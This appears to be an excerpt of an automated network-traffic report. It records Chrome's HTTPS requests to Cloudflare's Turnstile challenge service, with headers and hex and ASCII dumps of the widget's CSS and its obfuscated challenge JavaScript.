                                                                                        Data Ascii: dding:0;width:100%}.main-wrapper,body{background-color:#fff;color:#232323;font-family:-apple-system,system-ui,blinkmacsystemfont,Segoe UI,roboto,oxygen,ubuntu,Helvetica Neue,arial,sans-serif;font-size:14px;font-weight:400;-webkit-font-smoothing:antialiase
                                                                                        2024-12-18 01:10:32 UTC1369INData Raw: 73 74 72 6f 6b 65 3a 23 30 33 38 31 32 37 3b 61 6e 69 6d 61 74 69 6f 6e 3a 66 69 72 65 77 6f 72 6b 20 2e 33 73 20 65 61 73 65 2d 6f 75 74 20 31 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 3b 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 33 32 20 33 32 3b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 2d 38 7d 23 73 75 63 63 65 73 73 2d 74 65 78 74 7b 61 6e 69 6d 61 74 69 6f 6e 3a 66 61 64 65 2d 69 6e 20 31 73 20 66 6f 72 77 61 72 64 73 3b 6f 70 61 63 69 74 79 3a 30 7d 2e 73 75 63 63 65 73 73 2d 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 32 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 31 30 3b 73 74 72 6f 6b 65 3a 23 30 33 38 31 32 37 3b 66 69 6c 6c 3a 23
                                                                                        Data Ascii: stroke:#038127;animation:firework .3s ease-out 1;stroke-width:1;stroke-dasharray:32 32;stroke-dashoffset:-8}#success-text{animation:fade-in 1s forwards;opacity:0}.success-circle{stroke-dashoffset:0;stroke-width:2;stroke-miterlimit:10;stroke:#038127;fill:#
                                                                                        2024-12-18 01:10:32 UTC1369INData Raw: 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 68 6f 76 65 72 2c 2e 74 68 65 6d 65 2d 64 61 72
                                                                                        Data Ascii: e-dark #challenge-overlay a,.theme-dark #challenge-overlay a:link,.theme-dark #challenge-overlay a:visited{color:#bbb}.theme-dark #challenge-error-text a:active,.theme-dark #challenge-error-text a:focus,.theme-dark #challenge-error-text a:hover,.theme-dar
                                                                                        2024-12-18 01:10:32 UTC1369INData Raw: 32 30 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 66 69 6c 6c 3a 23 66 66 66 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68
                                                                                        Data Ascii: 20}.theme-dark .logo-text{fill:#fff}.theme-dark #fr-helper-loop-link,.theme-dark #fr-helper-loop-link:link,.theme-dark #fr-helper-loop-link:visited{color:#bbb}.theme-dark #fr-helper-loop-link:active,.theme-dark #fr-helper-loop-link:focus,.theme-dark #fr-h
                                                                                        2024-12-18 01:10:32 UTC1369INData Raw: 3b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 31 36 36 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 32 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 31 30 3b 73 74 72 6f 6b 65 3a 23 64 65 31 33 30 33 3b 66 69 6c 6c 3a 23 64 65 31 33 30 33 3b 61 6e 69 6d 61 74 69 6f 6e 3a 73 74 72 6f 6b 65 20 2e 36 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 36 35 2c 30 2c 2e 34 35 2c 31 29 20 66 6f 72 77 61 72 64 73 7d 2e 66 61 69 6c 75 72 65 2d 63 72 6f 73 73 7b 66 69 6c 6c 3a 23 66 66 66 3b 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 62 6f 74 74 6f 6d 20 63 65 6e 74 65 72 7d 40 6b 65 79 66 72 61 6d 65 73 20 66 61 64 65 2d 69 6e 2e 61 6e 69 6d 61 74 69 6f 6e 7b 30 25 7b 66 69 6c 6c 3a 23 64 65 31 33 30 33 3b 73 74 72 6f 6b 65 3a 23 64 65 31
                                                                                        Data Ascii: ;stroke-dashoffset:166;stroke-width:2;stroke-miterlimit:10;stroke:#de1303;fill:#de1303;animation:stroke .6s cubic-bezier(.65,0,.45,1) forwards}.failure-cross{fill:#fff;transform-origin:bottom center}@keyframes fade-in.animation{0%{fill:#de1303;stroke:#de1
                                                                                        2024-12-18 01:10:32 UTC1369INData Raw: 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 66 6c 6f 77 3a 63 6f 6c 75 6d 6e 20 6e 6f 77 72 61 70 3b 67 61 70 3a 30 3b 68 65 69 67 68 74 3a 31 34 30 70 78 3b 70 61 64 64 69 6e 67 3a 31 32 70 78 20 30 3b 70 6c 61 63 65 2d 63 6f 6e 74 65 6e 74 3a 73 70 61 63 65 2d 62 65 74 77 65 65 6e 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 6c 69 6e 6b 2d 73 70 61 63 65 72 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 33 70 78 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 33 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 63 62 2d 63 7b 6d 61 72 67 69 6e 3a 30 20 31 32 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 63 62 2d 63 6f 6e 74 61 69 6e 65 72 7b 6d 61 72 67 69 6e 3a 30 20 31 32 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d
                                                                                        Data Ascii: ay:flex;flex-flow:column nowrap;gap:0;height:140px;padding:12px 0;place-content:space-between}.size-compact .link-spacer{margin-left:3px;margin-right:3px}.size-compact .cb-c{margin:0 12px;text-align:left}.size-compact .cb-container{margin:0 12px}.size-com
                                                                                        2024-12-18 01:10:32 UTC1369INData Raw: 69 7b 6c 65 66 74 3a 32 35 35 70 78 7d 2e 72 74 6c 20 23 66 72 2d 68 65 6c 70 65 72 2c 2e 72 74 6c 20 23 66 72 2d 6f 76 65 72 72 75 6e 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2e 32 35 65 6d 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 30 7d 2e 72 74 6c 20 23 62 72 61 6e 64 69 6e 67 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 31 36 70 78 3b 77 69 64 74 68 3a 39 30 70 78 7d 2e 72 74 6c 20 23 62 72 61 6e 64 69 6e 67 2c 2e 72 74 6c 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 62 72 61 6e 64 69 6e 67 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 30 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 2e 72 74 6c 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 62 72 61 6e 64 69 6e 67 7b 61 6c 69 67 6e 2d 73 65 6c 66 3a 66 6c 65
                                                                                        Data Ascii: i{left:255px}.rtl #fr-helper,.rtl #fr-overrun{margin-left:.25em;margin-right:0}.rtl #branding{margin:0 0 0 16px;width:90px}.rtl #branding,.rtl.size-compact #branding{padding-left:0;padding-right:0;text-align:left}.rtl.size-compact #branding{align-self:fle
                                                                                        2024-12-18 01:10:32 UTC1369INData Raw: 6f 6c 6f 72 3a 23 31 36 36 33 37 39 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 6c 69 6e 6b 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 2e 69 2d 77 72 61 70 70 65 72 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 2e 75 6e 73 70 75 6e 20 2e 63 69 72 63 6c 65 7b 61 6e 69 6d 61 74 69 6f 6e 3a 75 6e 73 70 69 6e 20 2e 37 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 36 35 2c 30 2c 2e 34 35 2c 31 29 20 66 6f 72 77 61 72 64 73 7d 2e 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 77 69 64 74 68
                                                                                        Data Ascii: olor:#166379;text-decoration:underline}#challenge-error-title a:link,#challenge-error-title a:visited{color:#232323}#challenge-error-title .i-wrapper{display:none}.unspun .circle{animation:unspin .7s cubic-bezier(.65,0,.45,1) forwards}.circle{stroke-width


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        13192.168.2.1649733104.18.95.414436728C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-18 01:10:33 UTC727OUTGET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8f3b461238074211&lang=auto HTTP/1.1
                                                                                        Host: challenges.cloudflare.com
                                                                                        Connection: keep-alive
                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                        sec-ch-ua-mobile: ?0
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                        sec-ch-ua-platform: "Windows"
                                                                                        Accept: */*
                                                                                        Sec-Fetch-Site: same-origin
                                                                                        Sec-Fetch-Mode: no-cors
                                                                                        Sec-Fetch-Dest: script
                                                                                        Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/i61ws/0x4AAAAAAA0qv3MB2HiD-Mp6/auto/fbE/normal/auto/
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        2024-12-18 01:10:33 UTC331INHTTP/1.1 200 OK
                                                                                        Date: Wed, 18 Dec 2024 01:10:33 GMT
                                                                                        Content-Type: application/javascript; charset=UTF-8
                                                                                        Content-Length: 113903
                                                                                        Connection: close
                                                                                        cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8f3b461d0e3941bd-EWR
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        2024-12-18 01:10:33 UTC1038INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 53 79 57 4f 55 33 3d 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 64 65 76 65 6c 6f 70 65 72 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 66 75 6e 64 61 6d 65 6e 74 61 6c 73 25 32 46 67 65 74 2d 73 74 61 72 74 65 64 25 32 46 63 6f 6e 63 65 70 74 73 25 32 46 63 6c 6f 75 64 66 6c 61 72 65 2d 63 68 61 6c 6c 65 6e 67 65 73 25 32 46 25 32 33 62 72 6f 77 73 65 72 2d 73 75 70 70 6f 72 74 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 74 65 72 6d 73 22 3a 22 68 74 74 70 73 25 33 41 25 32
                                                                                        Data Ascii: window._cf_chl_opt.uaO=false;window._cf_chl_opt.SyWOU3={"metadata":{"challenge.supported_browsers":"https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fcloudflare-challenges%2F%23browser-support","challenge.terms":"https%3A%2
                                                                                        2024-12-18 01:10:33 UTC1369INData Raw: 75 64 66 6c 61 72 65 2d 63 68 61 6c 6c 65 6e 67 65 73 25 32 46 25 32 33 62 72 6f 77 73 65 72 2d 73 75 70 70 6f 72 74 25 32 32 25 33 45 43 6c 69 63 6b 25 32 30 68 65 72 65 25 32 30 66 6f 72 25 32 30 6d 6f 72 65 25 32 30 69 6e 66 6f 72 6d 61 74 69 6f 6e 25 33 43 25 32 46 61 25 33 45 22 2c 22 6e 6f 74 5f 65 6d 62 65 64 64 65 64 22 3a 22 54 68 69 73 25 32 30 63 68 61 6c 6c 65 6e 67 65 25 32 30 6d 75 73 74 25 32 30 62 65 25 32 30 65 6d 62 65 64 64 65 64 25 32 30 69 6e 74 6f 25 32 30 61 25 32 30 70 61 72 65 6e 74 25 32 30 70 61 67 65 2e 22 2c 22 63 68 65 63 6b 5f 64 65 6c 61 79 73 22 3a 22 56 65 72 69 66 69 63 61 74 69 6f 6e 25 32 30 69 73 25 32 30 74 61 6b 69 6e 67 25 32 30 6c 6f 6e 67 65 72 25 32 30 74 68 61 6e 25 32 30 65 78 70 65 63 74 65 64 2e 25 32 30 43
                                                                                        Data Ascii: udflare-challenges%2F%23browser-support%22%3EClick%20here%20for%20more%20information%3C%2Fa%3E","not_embedded":"This%20challenge%20must%20be%20embedded%20into%20a%20parent%20page.","check_delays":"Verification%20is%20taking%20longer%20than%20expected.%20C
                                                                                        2024-12-18 01:10:33 UTC1369INData Raw: 2c 66 5a 2c 67 76 2c 67 7a 2c 67 41 2c 67 42 2c 67 46 2c 67 47 2c 67 48 2c 66 57 2c 66 58 29 7b 66 6f 72 28 67 4a 3d 62 2c 66 75 6e 63 74 69 6f 6e 28 63 2c 64 2c 67 49 2c 65 2c 66 29 7b 66 6f 72 28 67 49 3d 62 2c 65 3d 63 28 29 3b 21 21 5b 5d 3b 29 74 72 79 7b 69 66 28 66 3d 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 32 30 36 29 29 2f 31 2b 70 61 72 73 65 49 6e 74 28 67 49 28 33 37 37 29 29 2f 32 2b 70 61 72 73 65 49 6e 74 28 67 49 28 34 35 34 29 29 2f 33 2a 28 2d 70 61 72 73 65 49 6e 74 28 67 49 28 39 33 36 29 29 2f 34 29 2b 70 61 72 73 65 49 6e 74 28 67 49 28 33 38 35 29 29 2f 35 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 33 35 36 29 29 2f 36 2b 70 61 72 73 65 49 6e 74 28 67 49 28 37 36 34 29 29 2f 37 2b 70 61 72 73 65 49 6e 74 28 67 49 28 31 32 34 35
                                                                                        Data Ascii: ,fZ,gv,gz,gA,gB,gF,gG,gH,fW,fX){for(gJ=b,function(c,d,gI,e,f){for(gI=b,e=c();!![];)try{if(f=-parseInt(gI(1206))/1+parseInt(gI(377))/2+parseInt(gI(454))/3*(-parseInt(gI(936))/4)+parseInt(gI(385))/5+-parseInt(gI(1356))/6+parseInt(gI(764))/7+parseInt(gI(1245
                                                                                        2024-12-18 01:10:33 UTC1369INData Raw: 5b 67 58 28 31 34 30 33 29 5d 29 2c 6b 5b 67 58 28 35 30 39 29 5d 28 67 5b 67 58 28 37 30 33 29 5d 2c 45 72 72 6f 72 29 3f 6b 5b 67 58 28 39 38 35 29 5d 3d 3d 3d 6b 5b 67 58 28 31 30 38 36 29 5d 3f 73 5b 67 58 28 38 37 39 29 5d 3d 27 20 27 3a 67 5b 67 58 28 37 30 33 29 5d 3d 4a 53 4f 4e 5b 67 58 28 31 34 38 30 29 5d 28 67 5b 67 58 28 37 30 33 29 5d 2c 4f 62 6a 65 63 74 5b 67 58 28 31 32 30 37 29 5d 28 67 5b 67 58 28 37 30 33 29 5d 29 29 3a 67 58 28 35 32 35 29 3d 3d 3d 67 58 28 35 32 35 29 3f 67 5b 67 58 28 37 30 33 29 5d 3d 4a 53 4f 4e 5b 67 58 28 31 34 38 30 29 5d 28 67 5b 67 58 28 37 30 33 29 5d 29 3a 73 5b 67 58 28 31 30 30 39 29 5d 5b 67 58 28 31 33 38 36 29 5d 28 67 58 28 31 34 32 30 29 29 2c 6d 3d 69 7c 7c 6b 5b 67 58 28 31 33 31 34 29 5d 2c 6e 3d
                                                                                        Data Ascii: [gX(1403)]),k[gX(509)](g[gX(703)],Error)?k[gX(985)]===k[gX(1086)]?s[gX(879)]=' ':g[gX(703)]=JSON[gX(1480)](g[gX(703)],Object[gX(1207)](g[gX(703)])):gX(525)===gX(525)?g[gX(703)]=JSON[gX(1480)](g[gX(703)]):s[gX(1009)][gX(1386)](gX(1420)),m=i||k[gX(1314)],n=
                                                                                        2024-12-18 01:10:33 UTC1369INData Raw: 5b 33 5d 2c 31 30 29 29 3a 28 65 5b 67 59 28 33 39 35 29 5d 5b 67 59 28 32 35 34 29 5d 3d 65 5b 67 59 28 31 31 36 31 29 5d 2c 66 28 65 5b 67 59 28 35 31 33 29 5d 2c 67 59 28 31 33 32 38 29 29 29 29 29 3a 66 3d 4a 53 4f 4e 5b 67 59 28 31 34 38 30 29 5d 28 64 29 3b 72 65 74 75 72 6e 20 6d 3d 7b 7d 2c 6d 5b 67 59 28 33 37 34 29 5d 3d 66 2c 6d 5b 67 59 28 31 34 30 33 29 5d 3d 67 2c 6d 5b 67 59 28 37 34 38 29 5d 3d 68 2c 6d 5b 67 59 28 37 36 33 29 5d 3d 69 2c 6d 5b 67 59 28 37 30 33 29 5d 3d 64 2c 6d 7d 2c 65 4d 5b 67 4a 28 31 30 33 33 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 66 2c 67 2c 68 2c 69 2c 68 30 2c 6a 2c 6b 2c 6c 2c 6d 2c 6e 2c 6f 29 7b 28 68 30 3d 67 4a 2c 6a 3d 7b 7d 2c 6a 5b 68 30 28 35 38 30 29 5d 3d 68 30 28 31 33 39 37 29 2c 6a 5b 68 30 28 34
                                                                                        Data Ascii: [3],10)):(e[gY(395)][gY(254)]=e[gY(1161)],f(e[gY(513)],gY(1328))))):f=JSON[gY(1480)](d);return m={},m[gY(374)]=f,m[gY(1403)]=g,m[gY(748)]=h,m[gY(763)]=i,m[gY(703)]=d,m},eM[gJ(1033)]=function(e,f,g,h,i,h0,j,k,l,m,n,o){(h0=gJ,j={},j[h0(580)]=h0(1397),j[h0(4
                                                                                        2024-12-18 01:10:33 UTC1369INData Raw: 74 65 72 76 61 6c 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 55 28 29 7d 2c 31 65 33 29 3a 65 26 26 65 5b 68 52 28 31 30 33 37 29 5d 3d 3d 3d 68 52 28 31 33 39 37 29 26 26 65 5b 68 52 28 31 31 32 36 29 5d 3d 3d 3d 68 52 28 37 30 30 29 26 26 28 68 52 28 38 35 32 29 3d 3d 3d 64 5b 68 52 28 32 32 39 29 5d 3f 65 5b 64 5b 68 52 28 32 34 32 29 5d 5d 5b 68 52 28 31 31 37 33 29 5d 28 7b 27 73 6f 75 72 63 65 27 3a 68 52 28 31 33 39 37 29 2c 27 77 69 64 67 65 74 49 64 27 3a 66 5b 68 52 28 38 39 33 29 5d 5b 68 52 28 35 32 36 29 5d 2c 27 66 65 65 64 62 61 63 6b 4f 72 69 67 69 6e 27 3a 64 5b 68 52 28 31 34 37 37 29 5d 2c 27 65 76 65 6e 74 27 3a 64 5b 68 52 28 31 36 33 29 5d 7d 2c 27 2a 27 29 3a 64 5b 68 52 28 31 31 33 32 29 5d 28 63 6c 65 61 72 49 6e 74 65 72 76 61 6c 2c
                                                                                        Data Ascii: terval(function(){fU()},1e3):e&&e[hR(1037)]===hR(1397)&&e[hR(1126)]===hR(700)&&(hR(852)===d[hR(229)]?e[d[hR(242)]][hR(1173)]({'source':hR(1397),'widgetId':f[hR(893)][hR(526)],'feedbackOrigin':d[hR(1477)],'event':d[hR(163)]},'*'):d[hR(1132)](clearInterval,
                                                                                        2024-12-18 01:10:33 UTC1369INData Raw: 3a 73 65 74 54 69 6d 65 6f 75 74 28 67 79 2c 30 29 2c 67 7a 3d 66 75 6e 63 74 69 6f 6e 28 6a 72 2c 64 2c 65 2c 66 2c 67 29 7b 72 65 74 75 72 6e 20 6a 72 3d 67 4a 2c 64 3d 7b 27 44 69 63 4f 78 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 2b 69 7d 2c 27 58 59 54 58 49 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3e 69 7d 2c 27 4c 4a 53 56 6d 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 7c 68 7d 2c 27 6f 71 69 56 56 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c 3c 69 7d 2c 27 4b 67 70 7a 76 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3d 3d 69 7d 2c 27 47 56 43 76 6d 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74
                                                                                        Data Ascii: :setTimeout(gy,0),gz=function(jr,d,e,f,g){return jr=gJ,d={'DicOx':function(h,i){return h+i},'XYTXI':function(h,i){return h>i},'LJSVm':function(h,i){return i|h},'oqiVV':function(h,i){return h<<i},'Kgpzv':function(h,i){return h==i},'GVCvm':function(h,i){ret
                                                                                        2024-12-18 01:10:33 UTC1369INData Raw: 7b 72 65 74 75 72 6e 20 68 3d 3d 6e 75 6c 6c 3f 27 27 3a 66 2e 67 28 68 2c 36 2c 66 75 6e 63 74 69 6f 6e 28 69 2c 6a 73 29 7b 72 65 74 75 72 6e 20 6a 73 3d 62 2c 6a 73 28 31 31 33 35 29 5b 6a 73 28 31 35 36 33 29 5d 28 69 29 7d 29 7d 2c 27 67 27 3a 66 75 6e 63 74 69 6f 6e 28 69 2c 6a 2c 6f 2c 6a 74 2c 73 2c 78 2c 42 2c 43 2c 44 2c 45 2c 46 2c 47 2c 48 2c 49 2c 4a 2c 4b 2c 4c 2c 4d 29 7b 69 66 28 6a 74 3d 6a 72 2c 6e 75 6c 6c 3d 3d 69 29 72 65 74 75 72 6e 27 27 3b 66 6f 72 28 78 3d 7b 7d 2c 42 3d 7b 7d 2c 43 3d 27 27 2c 44 3d 32 2c 45 3d 33 2c 46 3d 32 2c 47 3d 5b 5d 2c 48 3d 30 2c 49 3d 30 2c 4a 3d 30 3b 4a 3c 69 5b 6a 74 28 31 34 38 35 29 5d 3b 4a 2b 3d 31 29 69 66 28 4b 3d 69 5b 6a 74 28 31 35 36 33 29 5d 28 4a 29 2c 4f 62 6a 65 63 74 5b 6a 74 28 34 39
                                                                                        Data Ascii: {return h==null?'':f.g(h,6,function(i,js){return js=b,js(1135)[js(1563)](i)})},'g':function(i,j,o,jt,s,x,B,C,D,E,F,G,H,I,J,K,L,M){if(jt=jr,null==i)return'';for(x={},B={},C='',D=2,E=3,F=2,G=[],H=0,I=0,J=0;J<i[jt(1485)];J+=1)if(K=i[jt(1563)](J),Object[jt(49
                                                                                        2024-12-18 01:10:33 UTC1369INData Raw: 64 5b 6a 74 28 31 36 37 29 5d 28 48 2c 31 29 2c 64 5b 6a 74 28 34 34 37 29 5d 28 4d 2c 31 29 29 2c 64 5b 6a 74 28 31 30 37 32 29 5d 28 49 2c 64 5b 6a 74 28 32 32 38 29 5d 28 6a 2c 31 29 29 3f 28 49 3d 30 2c 47 5b 6a 74 28 34 32 38 29 5d 28 6f 28 48 29 29 2c 48 3d 30 29 3a 49 2b 2b 2c 4d 3e 3e 3d 31 2c 73 2b 2b 29 3b 7d 65 6c 73 65 7b 66 6f 72 28 4d 3d 31 2c 73 3d 30 3b 64 5b 6a 74 28 39 34 36 29 5d 28 73 2c 46 29 3b 48 3d 4d 7c 48 3c 3c 31 2e 33 34 2c 49 3d 3d 6a 2d 31 3f 28 49 3d 30 2c 47 5b 6a 74 28 34 32 38 29 5d 28 6f 28 48 29 29 2c 48 3d 30 29 3a 49 2b 2b 2c 4d 3d 30 2c 73 2b 2b 29 3b 66 6f 72 28 4d 3d 43 5b 6a 74 28 33 38 36 29 5d 28 30 29 2c 73 3d 30 3b 64 5b 6a 74 28 33 32 36 29 5d 28 31 36 2c 73 29 3b 48 3d 48 3c 3c 31 2e 39 37 7c 4d 26 31 2c 49
                                                                                        Data Ascii: d[jt(167)](H,1),d[jt(447)](M,1)),d[jt(1072)](I,d[jt(228)](j,1))?(I=0,G[jt(428)](o(H)),H=0):I++,M>>=1,s++);}else{for(M=1,s=0;d[jt(946)](s,F);H=M|H<<1.34,I==j-1?(I=0,G[jt(428)](o(H)),H=0):I++,M=0,s++);for(M=C[jt(386)](0),s=0;d[jt(326)](16,s);H=H<<1.97|M&1,I
                                                                                        2024-12-18 01:10:34 UTC1369INData Raw: 5d 28 6f 2c 49 2b 2b 29 29 2c 4a 7c 3d 28 30 3c 4c 3f 31 3a 30 29 2a 46 2c 46 3c 3c 3d 31 29 3b 4d 3d 65 28 4a 29 3b 62 72 65 61 6b 3b 63 61 73 65 20 32 3a 72 65 74 75 72 6e 27 27 7d 66 6f 72 28 45 3d 73 5b 33 5d 3d 4d 2c 44 5b 6a 77 28 34 32 38 29 5d 28 4d 29 3b 3b 29 7b 69 66 28 64 5b 6a 77 28 31 33 35 35 29 5d 28 49 2c 69 29 29 72 65 74 75 72 6e 27 27 3b 66 6f 72 28 4a 3d 30 2c 4b 3d 4d 61 74 68 5b 6a 77 28 33 35 38 29 5d 28 32 2c 43 29 2c 46 3d 31 3b 46 21 3d 4b 3b 4c 3d 48 26 47 2c 48 3e 3e 3d 31 2c 64 5b 6a 77 28 31 32 32 31 29 5d 28 30 2c 48 29 26 26 28 48 3d 6a 2c 47 3d 6f 28 49 2b 2b 29 29 2c 4a 7c 3d 64 5b 6a 77 28 34 31 30 29 5d 28 64 5b 6a 77 28 39 34 36 29 5d 28 30 2c 4c 29 3f 31 3a 30 2c 46 29 2c 46 3c 3c 3d 31 29 3b 73 77 69 74 63 68 28 4d
                                                                                        Data Ascii: ](o,I++)),J|=(0<L?1:0)*F,F<<=1);M=e(J);break;case 2:return''}for(E=s[3]=M,D[jw(428)](M);;){if(d[jw(1355)](I,i))return'';for(J=0,K=Math[jw(358)](2,C),F=1;F!=K;L=H&G,H>>=1,d[jw(1221)](0,H)&&(H=j,G=o(I++)),J|=d[jw(410)](d[jw(946)](0,L)?1:0,F),F<<=1);switch(M


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        14192.168.2.1649734104.18.95.414436728C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-18 01:10:33 UTC739OUTGET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1
                                                                                        Host: challenges.cloudflare.com
                                                                                        Connection: keep-alive
                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                        sec-ch-ua-mobile: ?0
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                        sec-ch-ua-platform: "Windows"
                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                        Sec-Fetch-Site: same-origin
                                                                                        Sec-Fetch-Mode: no-cors
